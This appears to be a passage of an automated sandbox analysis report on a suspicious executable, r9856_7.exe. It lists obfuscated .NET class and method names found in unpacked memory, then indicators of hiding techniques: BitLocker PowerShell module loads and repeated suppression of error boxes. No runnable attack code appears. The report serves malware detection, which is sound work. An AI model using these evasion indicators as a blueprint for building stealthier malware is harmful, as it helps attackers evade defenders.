            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, WoXa78F6A6MHPor4Yk.csHigh entropy of concatenated method names: 'tUjr7WgILM', 'LJhrgkkXq1', 'nGHraKh5u7', 'jIQrKZtkkw', 'yxkr9Z3VRR', 'dROrRbkCFY', 'awMroFrbm4', 'AtVrdI8cyF', 'SyErfubbH8', 'ns4rYusSJr'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, UB2DdX4fSbxUEESFDU.csHigh entropy of concatenated method names: 'kWX9ENNYI0', 'yF59gIaDSi', 'xUb9KSnf6S', 'HSW9RJuRCC', 'xUu9ojf4lC', 'WU6KZ3i8XQ', 'yF7KCrFiZM', 'RAmK1jr4Js', 'qUDKQToLnf', 'sQPKyeYlbw'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, tIqv8BNn1A5G8A2bwb.csHigh entropy of concatenated method names: 'Dispose', 'LKjey0eXVA', 'LCSxHHY8Ss', 'g3mTT13A8Y', 'c2yeXQFXa7', 'HD8ez9l6Q1', 'ProcessDialogKey', 'zQtxhavnBX', 'ykjxenqBTh', 'hqnxxUudhE'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, X4uCtIra7gquiEjCWI.csHigh entropy of concatenated method names: 'UoRqjikHQs', 'nMeqICdBIj', 'xGqqVcpJuJ', 'mC0qwyQlmr', 'LYiqHCTIM8', 'F4kqpv0dxc', 'Vnaq8efoHO', 'Qbeqb7kvQZ', 'fAyqWvCeaR', 'K6LqtDILes'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, xTfqVxKLKgov2Y6ZUZB.csHigh entropy of concatenated method names: 'KkXFBKu8Kj', 'VyhFPyY2fb', 'QRLF5wjQep', 'mSEFUmlfrV', 'drMFsx2JCa', 'rdrFDqUuqS', 'HutFmVHhcX', 'oDYFvTZtUS', 'dwIFS04WHJ', 'FkJFnrb88C'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, Pa5GaI7WaJYAkD0PPP.csHigh entropy of concatenated method names: 'YUlIgunKJO7rs9AQAUT', 'fAUxKCnGH3kWudcPOeu', 'zarpyJnTw01kXPdO9r1', 'Rb99rwKBA7', 'UXd9FlJwmc', 'o8e93k0HSv', 'NWYWdqnH7ZtIyvBUbFJ', 'HqHLexnSLTF6ngXyy5Y'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, gj7iW9mnV0ZbVLwQov.csHigh entropy of concatenated method names: 'SbprLVGJfn', 'l25rHxYPmH', 'EJurpCV3hK', 'kDsr885XYl', 'EVLrV89hul', 'Ar7rbThlXp', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, R5WHd7jjS2qu79hBQr.csHigh entropy of concatenated method names: 'tkT4QAg8Xn', 'gA14XrhvvR', 'ykcrhafsRs', 'EJdrek0k1j', 'iVk4JUPlij', 'NFw4I3qyRE', 'zg54larQhV', 'KpP4VuFSvq', 'oba4whdNFj', 'Arm4cHNPbL'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, sbGWalEaq1DaO7LRgs.csHigh entropy of concatenated method names: 'dwG0ETeMBO', 'lqX07aM3hQ', 'wSU0gO9agK', 'Rqp0aqc1Q7', 'T5M0Kkf0Ic', 'HFp09EcMtu', 'NLZ0RZV03w', 'CjH0oBRZge', 'L0i0ddMIVw', 'lQb0f9V2LZ'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, riHfqebJ9xCisJtmEG.csHigh entropy of concatenated method names: 'ICe4fxkBXp', 'pga4YaAgKW', 'ToString', 'g3n47IqjH0', 'yDn4gmoHG4', 'Rkc4am4smG', 'q3v4K5VDuD', 'vqb49rObOb', 'J8b4RbO4he', 'xo74o6Rq78'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, uecTtq5OpMxGjAuSBN.csHigh entropy of concatenated method names: 'PfD5DWaua', 'VNWUC5sEH', 'LUsDTGyI5', 'MlFmWjG54', 'XEeSXYYIA', 'cFQnFtVxP', 'Pm9taXblTm2O1HaGEq', 'mSpXZIhxASA5KsPsDB', 'eRMrQHwuW', 'FE43rK9jY'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, koxQO7xoh3cB9rglS7.csHigh entropy of concatenated method names: 'tXHKssZC8D', 'VJgKmaeLd4', 'YaKappCgmh', 'PFya8ohXlH', 'yphabL1xQr', 'EBJaW05mr8', 'RJeatTKPPy', 'lYvaOLv7Zc', 'JkYakeVdQR', 'XpoajD7ZbK'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, yLcVqjAhUsybQFpIrK.csHigh entropy of concatenated method names: 'exjgVFTqrO', 'YZFgwuwkN2', 'u9DgcgAgbw', 'G8UgMp8V51', 'xYZgZFwfgN', 'FJSgCLbk3O', 'YOOg176vPG', 'SGqgQNvqF0', 'gpUgynNZAn', 'FGJgXgSgGA'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, WUZljehAB4HeM46ncF.csHigh entropy of concatenated method names: 'v4rR78b9EJ', 'rJjRaETjIB', 'tvER9bIG94', 'gbd9XEUDBn', 'MTL9zSxNdA', 'fLnRhSF6ri', 'PrLReEcqpZ', 'BIvRxU6XBq', 'sTvR0JRemt', 'Q4rRAKDBvY'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, D9miIsXwhww83cgMvM.csHigh entropy of concatenated method names: 'o2ERBfNT4l', 'gIrRPgQkMR', 'QybR5vi49y', 'caURUBtrtw', 'IGtRsSIyMo', 's14RDYdV8S', 'CGLRmEfSjO', 'ooFRvNNW53', 'etqRS30GIL', 'yCHRn7KQy3'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, RlL94mzCIBEtWS97Xi.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SLJF6PuBQB', 'yyZFqYk4nX', 'XclF2EHeuo', 'O5ZF4mGm4O', 'Jw1Fr2kh3c', 'OlMFFf8J5i', 'S14F3Jd9Ml'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, dC2uWYCAb7Qhq9O8jj.csHigh entropy of concatenated method names: 'njeaUiIWDF', 'nPiaD8Crti', 'nkcavuj5uu', 'UkYaSXJ16l', 'glTaqtTPsa', 'wf0a2VpniN', 'wC4a4W5DL2', 'TSrarPJn0o', 'EfFaFMQ492', 'fqba3aEmXY'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, uCPM2lWJOst0iVkmxT.csHigh entropy of concatenated method names: 'QqVFeplcZq', 'nv0F0rxkxO', 'sLpFALn6S1', 'uurF77yY2t', 'oWeFgiUbuG', 'ABKFKZi5n0', 'aobF9kJXPt', 'rGMr1omEdd', 'NmIrQQ6ViE', 'HSrryS9QHF'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, Vd8QHTOMg7OJIsN9YM.csHigh entropy of concatenated method names: 'VvZeRUWKog', 'yRceotDeMS', 'NGcefTUdNM', 'M8weY0HxH1', 'iDBeqiStj2', 'd7Ye2uX3Mf', 'mja4UAOGpHd4uBjpva', 'X8jtE5Unat4peMi7KL', 'TXXeeXFkLX', 'LLje0UubfK'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, zAd6VDKK5y7evjsyJIj.csHigh entropy of concatenated method names: 'ToString', 'cRZ30RgDXT', 'KFG3AWWFEd', 'Cef3Eb6yIU', 'pHZ37YA02f', 'ncc3gTXvPK', 'J8h3amo5Ib', 'oXH3Kfs6Qa', 'sBF2qDLNjMGXVxbjkmC', 'vxiM0BLu19p7uh87AeY'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, QPTvFwygSCUM3wR1kg.csHigh entropy of concatenated method names: 'xUX6v8tSRY', 'G5k6SAu3Pl', 'o8K6LMPh9u', 'mQo6HxbP3t', 'HCy68weo1f', 'qIl6baMU7i', 'ven6tX00Oo', 'Qwv6Ob6KTb', 'W396jHBhdN', 'lJ96J2LC5b'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, iWp7neG5i0XxENSU0d.csHigh entropy of concatenated method names: 'ToString', 'NK62Jqs2Ai', 'xc92HLqk47', 'sbA2pQCLHq', 'Qmb28qYqUi', 'cmw2bOyqe3', 'rEa2WURIvo', 'JBt2tYsM7v', 'EEL2OZ5nig', 'O0f2kC5ALa'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, biAsJiKwakSjilHmdMS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SVM3V1f0RV', 'rMI3w5secu', 'Iat3cKTf9N', 'los3MXmQ7c', 'uO53ZGViyl', 'RLc3CtkuYU', 'glk31HlkK3'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, WoXa78F6A6MHPor4Yk.csHigh entropy of concatenated method names: 'tUjr7WgILM', 'LJhrgkkXq1', 'nGHraKh5u7', 'jIQrKZtkkw', 'yxkr9Z3VRR', 'dROrRbkCFY', 'awMroFrbm4', 'AtVrdI8cyF', 'SyErfubbH8', 'ns4rYusSJr'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, UB2DdX4fSbxUEESFDU.csHigh entropy of concatenated method names: 'kWX9ENNYI0', 'yF59gIaDSi', 'xUb9KSnf6S', 'HSW9RJuRCC', 'xUu9ojf4lC', 'WU6KZ3i8XQ', 'yF7KCrFiZM', 'RAmK1jr4Js', 'qUDKQToLnf', 'sQPKyeYlbw'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, tIqv8BNn1A5G8A2bwb.csHigh entropy of concatenated method names: 'Dispose', 'LKjey0eXVA', 'LCSxHHY8Ss', 'g3mTT13A8Y', 'c2yeXQFXa7', 'HD8ez9l6Q1', 'ProcessDialogKey', 'zQtxhavnBX', 'ykjxenqBTh', 'hqnxxUudhE'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, X4uCtIra7gquiEjCWI.csHigh entropy of concatenated method names: 'UoRqjikHQs', 'nMeqICdBIj', 'xGqqVcpJuJ', 'mC0qwyQlmr', 'LYiqHCTIM8', 'F4kqpv0dxc', 'Vnaq8efoHO', 'Qbeqb7kvQZ', 'fAyqWvCeaR', 'K6LqtDILes'
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, xTfqVxKLKgov2Y6ZUZB.csHigh entropy of concatenated method names: 'KkXFBKu8Kj', 'VyhFPyY2fb', 'QRLF5wjQep', 'mSEFUmlfrV', 'drMFsx2JCa', 'rdrFDqUuqS', 'HutFmVHhcX', 'oDYFvTZtUS', 'dwIFS04WHJ', 'FkJFnrb88C'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, Pa5GaI7WaJYAkD0PPP.csHigh entropy of concatenated method names: 'YUlIgunKJO7rs9AQAUT', 'fAUxKCnGH3kWudcPOeu', 'zarpyJnTw01kXPdO9r1', 'Rb99rwKBA7', 'UXd9FlJwmc', 'o8e93k0HSv', 'NWYWdqnH7ZtIyvBUbFJ', 'HqHLexnSLTF6ngXyy5Y'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, gj7iW9mnV0ZbVLwQov.csHigh entropy of concatenated method names: 'SbprLVGJfn', 'l25rHxYPmH', 'EJurpCV3hK', 'kDsr885XYl', 'EVLrV89hul', 'Ar7rbThlXp', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, R5WHd7jjS2qu79hBQr.csHigh entropy of concatenated method names: 'tkT4QAg8Xn', 'gA14XrhvvR', 'ykcrhafsRs', 'EJdrek0k1j', 'iVk4JUPlij', 'NFw4I3qyRE', 'zg54larQhV', 'KpP4VuFSvq', 'oba4whdNFj', 'Arm4cHNPbL'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, sbGWalEaq1DaO7LRgs.csHigh entropy of concatenated method names: 'dwG0ETeMBO', 'lqX07aM3hQ', 'wSU0gO9agK', 'Rqp0aqc1Q7', 'T5M0Kkf0Ic', 'HFp09EcMtu', 'NLZ0RZV03w', 'CjH0oBRZge', 'L0i0ddMIVw', 'lQb0f9V2LZ'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, riHfqebJ9xCisJtmEG.csHigh entropy of concatenated method names: 'ICe4fxkBXp', 'pga4YaAgKW', 'ToString', 'g3n47IqjH0', 'yDn4gmoHG4', 'Rkc4am4smG', 'q3v4K5VDuD', 'vqb49rObOb', 'J8b4RbO4he', 'xo74o6Rq78'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, uecTtq5OpMxGjAuSBN.csHigh entropy of concatenated method names: 'PfD5DWaua', 'VNWUC5sEH', 'LUsDTGyI5', 'MlFmWjG54', 'XEeSXYYIA', 'cFQnFtVxP', 'Pm9taXblTm2O1HaGEq', 'mSpXZIhxASA5KsPsDB', 'eRMrQHwuW', 'FE43rK9jY'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, koxQO7xoh3cB9rglS7.csHigh entropy of concatenated method names: 'tXHKssZC8D', 'VJgKmaeLd4', 'YaKappCgmh', 'PFya8ohXlH', 'yphabL1xQr', 'EBJaW05mr8', 'RJeatTKPPy', 'lYvaOLv7Zc', 'JkYakeVdQR', 'XpoajD7ZbK'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, yLcVqjAhUsybQFpIrK.csHigh entropy of concatenated method names: 'exjgVFTqrO', 'YZFgwuwkN2', 'u9DgcgAgbw', 'G8UgMp8V51', 'xYZgZFwfgN', 'FJSgCLbk3O', 'YOOg176vPG', 'SGqgQNvqF0', 'gpUgynNZAn', 'FGJgXgSgGA'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, WUZljehAB4HeM46ncF.csHigh entropy of concatenated method names: 'v4rR78b9EJ', 'rJjRaETjIB', 'tvER9bIG94', 'gbd9XEUDBn', 'MTL9zSxNdA', 'fLnRhSF6ri', 'PrLReEcqpZ', 'BIvRxU6XBq', 'sTvR0JRemt', 'Q4rRAKDBvY'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, D9miIsXwhww83cgMvM.csHigh entropy of concatenated method names: 'o2ERBfNT4l', 'gIrRPgQkMR', 'QybR5vi49y', 'caURUBtrtw', 'IGtRsSIyMo', 's14RDYdV8S', 'CGLRmEfSjO', 'ooFRvNNW53', 'etqRS30GIL', 'yCHRn7KQy3'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, RlL94mzCIBEtWS97Xi.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SLJF6PuBQB', 'yyZFqYk4nX', 'XclF2EHeuo', 'O5ZF4mGm4O', 'Jw1Fr2kh3c', 'OlMFFf8J5i', 'S14F3Jd9Ml'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, dC2uWYCAb7Qhq9O8jj.csHigh entropy of concatenated method names: 'njeaUiIWDF', 'nPiaD8Crti', 'nkcavuj5uu', 'UkYaSXJ16l', 'glTaqtTPsa', 'wf0a2VpniN', 'wC4a4W5DL2', 'TSrarPJn0o', 'EfFaFMQ492', 'fqba3aEmXY'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, uCPM2lWJOst0iVkmxT.csHigh entropy of concatenated method names: 'QqVFeplcZq', 'nv0F0rxkxO', 'sLpFALn6S1', 'uurF77yY2t', 'oWeFgiUbuG', 'ABKFKZi5n0', 'aobF9kJXPt', 'rGMr1omEdd', 'NmIrQQ6ViE', 'HSrryS9QHF'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, Vd8QHTOMg7OJIsN9YM.csHigh entropy of concatenated method names: 'VvZeRUWKog', 'yRceotDeMS', 'NGcefTUdNM', 'M8weY0HxH1', 'iDBeqiStj2', 'd7Ye2uX3Mf', 'mja4UAOGpHd4uBjpva', 'X8jtE5Unat4peMi7KL', 'TXXeeXFkLX', 'LLje0UubfK'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, zAd6VDKK5y7evjsyJIj.csHigh entropy of concatenated method names: 'ToString', 'cRZ30RgDXT', 'KFG3AWWFEd', 'Cef3Eb6yIU', 'pHZ37YA02f', 'ncc3gTXvPK', 'J8h3amo5Ib', 'oXH3Kfs6Qa', 'sBF2qDLNjMGXVxbjkmC', 'vxiM0BLu19p7uh87AeY'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, QPTvFwygSCUM3wR1kg.csHigh entropy of concatenated method names: 'xUX6v8tSRY', 'G5k6SAu3Pl', 'o8K6LMPh9u', 'mQo6HxbP3t', 'HCy68weo1f', 'qIl6baMU7i', 'ven6tX00Oo', 'Qwv6Ob6KTb', 'W396jHBhdN', 'lJ96J2LC5b'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, iWp7neG5i0XxENSU0d.csHigh entropy of concatenated method names: 'ToString', 'NK62Jqs2Ai', 'xc92HLqk47', 'sbA2pQCLHq', 'Qmb28qYqUi', 'cmw2bOyqe3', 'rEa2WURIvo', 'JBt2tYsM7v', 'EEL2OZ5nig', 'O0f2kC5ALa'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, biAsJiKwakSjilHmdMS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SVM3V1f0RV', 'rMI3w5secu', 'Iat3cKTf9N', 'los3MXmQ7c', 'uO53ZGViyl', 'RLc3CtkuYU', 'glk31HlkK3'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, WoXa78F6A6MHPor4Yk.csHigh entropy of concatenated method names: 'tUjr7WgILM', 'LJhrgkkXq1', 'nGHraKh5u7', 'jIQrKZtkkw', 'yxkr9Z3VRR', 'dROrRbkCFY', 'awMroFrbm4', 'AtVrdI8cyF', 'SyErfubbH8', 'ns4rYusSJr'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, UB2DdX4fSbxUEESFDU.csHigh entropy of concatenated method names: 'kWX9ENNYI0', 'yF59gIaDSi', 'xUb9KSnf6S', 'HSW9RJuRCC', 'xUu9ojf4lC', 'WU6KZ3i8XQ', 'yF7KCrFiZM', 'RAmK1jr4Js', 'qUDKQToLnf', 'sQPKyeYlbw'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, tIqv8BNn1A5G8A2bwb.csHigh entropy of concatenated method names: 'Dispose', 'LKjey0eXVA', 'LCSxHHY8Ss', 'g3mTT13A8Y', 'c2yeXQFXa7', 'HD8ez9l6Q1', 'ProcessDialogKey', 'zQtxhavnBX', 'ykjxenqBTh', 'hqnxxUudhE'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, X4uCtIra7gquiEjCWI.csHigh entropy of concatenated method names: 'UoRqjikHQs', 'nMeqICdBIj', 'xGqqVcpJuJ', 'mC0qwyQlmr', 'LYiqHCTIM8', 'F4kqpv0dxc', 'Vnaq8efoHO', 'Qbeqb7kvQZ', 'fAyqWvCeaR', 'K6LqtDILes'
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, xTfqVxKLKgov2Y6ZUZB.csHigh entropy of concatenated method names: 'KkXFBKu8Kj', 'VyhFPyY2fb', 'QRLF5wjQep', 'mSEFUmlfrV', 'drMFsx2JCa', 'rdrFDqUuqS', 'HutFmVHhcX', 'oDYFvTZtUS', 'dwIFS04WHJ', 'FkJFnrb88C'

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
